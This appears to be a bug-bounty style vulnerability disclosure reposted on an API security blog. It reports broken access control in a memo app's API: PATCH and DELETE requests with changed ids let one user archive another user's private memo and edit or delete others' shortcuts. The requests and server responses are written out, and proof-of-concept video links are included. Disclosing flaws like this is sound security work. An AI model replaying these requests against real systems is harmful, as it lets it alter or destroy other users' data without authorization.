Site icon API Security Blog

Archive any private memos + Delete any Shortcut + Edit any Shortcut from other users

# Description
User can archive any private memos, Delete any Shortcut and Edit any Shortcut from other users via api
“`
PATCH /api/memo/8 HTTP/1.1

{“id”:8,”rowStatus”:”ARCHIVED”}
“`
“`
PATCH /api/shortcut/2 HTTP/1.1

{“id”:2,”title”:”shortahihix”,”payload”:”[]”}
“`
“`
DELETE /api/shortcut/2
“`

# Proof of Concept
Login to website in brower 1 with user A.

Login to website in brower 2 with user B.

Example: User B have private nemo with id 8.

With session in brower 1 with user A make a request

“`
PATCH /api/memo/8 HTTP/1.1

{“id”:8,”rowStatus”:”ARCHIVED”}
“`
And response
“`
{“data”:{“id”:8,”rowStatus”:”ARCHIVED”,”creatorId”:1,”createdTs”:1671805207,”updatedTs”:1671805219,”content”:”demo content”,”visibility”:”PRIVATE”,”pinned”:false,”displayTs”:1671805207,”creator”:{“id”:1,”rowStatus”:”NORMAL”,”createdTs”:1671803462,”updatedTs”:1671803845,”username”:”userB”,”role”:”HOST”,”email”:””,”nickname”:”userB”,”openId”:””,”userSettingList”:null},”resourceList”:[]}}

“`
Then memo with id equal to 8 was archived.

Demo video: [https://drive.google.com/file/d/1FYpaZlktndUk9fmoCy8q7PAPMOARBOE1/view](https://drive.google.com/file/d/1FYpaZlktndUk9fmoCy8q7PAPMOARBOE1/view)

# Similar to Delete shortcut
Change id for request will receive response “`true“`
“`
DELETE /api/shortcut/2 HTTP/1.1
Host: 127.0.0.1
“`

# Similar to Edit shortcut
Use request for edit any shortcut with id
“`
PATCH /api/shortcut/2 HTTP/1.1

{“id”:2,”title”:”shortahihix”,”payload”:”[]”}
“`
The response received is as follows
“`
{“data”:{“id”:2,”rowStatus”:”NORMAL”,”creatorId”:0,”createdTs”:1671875414,”updatedTs”:1671875430,”title”:”shortahihix”,”payload”:”[]”}}
“`
POC video for edit and delete shortcut [https://drive.google.com/file/d/1sIQ-OLXlDqvMDXMSJvicy9QO7rZDFobW/view](https://drive.google.com/file/d/1sIQ-OLXlDqvMDXMSJvicy9QO7rZDFobW/view)Read More

Exit mobile version